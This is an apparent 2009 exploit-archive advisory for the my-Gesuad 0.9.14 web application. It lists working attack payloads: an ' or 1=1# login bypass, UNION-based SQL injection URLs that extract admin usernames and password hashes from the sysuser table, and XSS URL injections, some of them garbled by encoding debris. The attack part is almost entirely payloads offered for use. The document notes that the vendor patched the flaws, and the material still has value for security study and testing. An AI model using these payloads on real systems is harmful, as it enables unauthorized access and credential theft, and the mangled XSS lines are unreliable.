|
---------------------------------------------------------=0D
MULTIPLE REMOTE VULNERABILITIES --my-Gesuad 0.9.14-->=0D
---------------------------------------------------------=0D
=0D
CMS INFORMATION:=0D
=0D
-->WEB: http://www.collector.ch/drupal5/index.php=0D
-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11=0D
-->DEMO: http://www.collector.ch/drupal5/?q=node/10=0D
-->CATEGORY: Management=0D
-->DESCRIPTION: Database application to manage applications...=0D
=0D
-->RELEASED: 2009-03-24=0D
=0D
CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: N/A=0D
-->CATEGORY: AUTH BYPASS/ SQL INJECTION / XSS=0D
-->AFFECT VERSION: 0.9.14 (maybe <= ?)=0D
-->Discovered Bug date: 2009-05-06=0D
-->Reported Bug date: 2009-05-06=0D
-->Fixed bug date: 2009-05-07=0D
-->Info patch: http://www.collector.ch/drupal5/?q=forum/15=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
=0D
=0D
=0D
#################=0D
/////////////////=0D
=0D
INTRODUCTION:=0D
=0D
/////////////////=0D
#################=0D
=0D
=0D
This app is similar to mycolex v1.4.2, then similar vulnerabilities xD=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
AUTH BYPASS (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>=0D
=0D
=0D
----------=0D
EXPLOIT:=0D
----------=0D
=0D
Name=' or 1=1#=0D
=0D
password=123456 (over six characters)=0D
=0D
Then, going to http://[HOST]/[HOME_PATH]/modules/admuser.php?Modus=Find=0D
=0D
We got admin credentials...=0D
=0D
Password is encrypted with MySQLSHA-1.=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
SQL INJECTION (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: Be a register user +++++++++++++++++--------->>>>=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes = ON/OFF +++++++++++++++++--------->>>>=0D
=0D
=0D
------------------=0D
PROOF OF CONCEPT:=0D
------------------=0D
=0D
=0D
Some examples:=0D
=0D
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database()+sysuser%23=0D
=0D
http://[HOST]/[HOME_PATH]/modules/budget.php?Modus=Detail&ID=5+AND+0+UNION+ALL+SELECT+1,database(),user(),4,5,6,7,8/*=0D
=0D
http://[HOST]/[HOME_PATH]/modules/zahlung.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version()/*&Kontext=adresse=0D
=0D
http://[HOST]/[HOME_PATH]/modules/adresse.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,version(),database()%23&Kontext=ereignis=0D
=0D
There are more...=0D
=0D
Return: user, version, ...=0D
=0D
=0D
----------=0D
EXPLOITS:=0D
----------=0D
=0D
=0D
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuPwd+FROM+sysuser+WHERE+SuID=1%23=0D
=0D
http://[HOST]/[HOME_PATH]/modules/budget.php?Modus=Detail&ID=5+AND+0+UNION+ALL+SELECT+1,SuUser,SuPwd,4,5,6,7,8+FROM+sysuser+WHERE+SuID=1/*=0D
=0D
Return: username/password (id=1)=0D
=0D
=0D
###########################=0D
///////////////////////////=0D
=0D
CROSS SITE SCRIPTING (XSS):=0D
=0D
///////////////////////////=0D
###########################=0D
=0D
=0D
XSS is possible where you like :P=0D
=0D
Some examples:=0D
=0D
=0D
&Order=ErAnfangsdatum=0D">http://[HOST]/[HOME_PATH]/modules/ereignis.php?Modus=List&Page=1">&Order=ErAnfangsdatum=0D
=0D
=0D">http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Search&Kontext=objekt">=0D
=0D
http://[HOST]/[HOME_PATH]/modules/image.php?image==0D
=0D
alert('y3nh4ck3r+was+here!')=0D">http://[HOST]/[HOME_PATH]/modules/sitzung.php?Modus=Detail&ID=1"=0D
=0D
=0D
Of course there are more...=0D
=0D
=0D
=0D
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!=0D
=0D
=0D
=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
## GREETZ TO: SPANISH H4ck3Rs community! ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################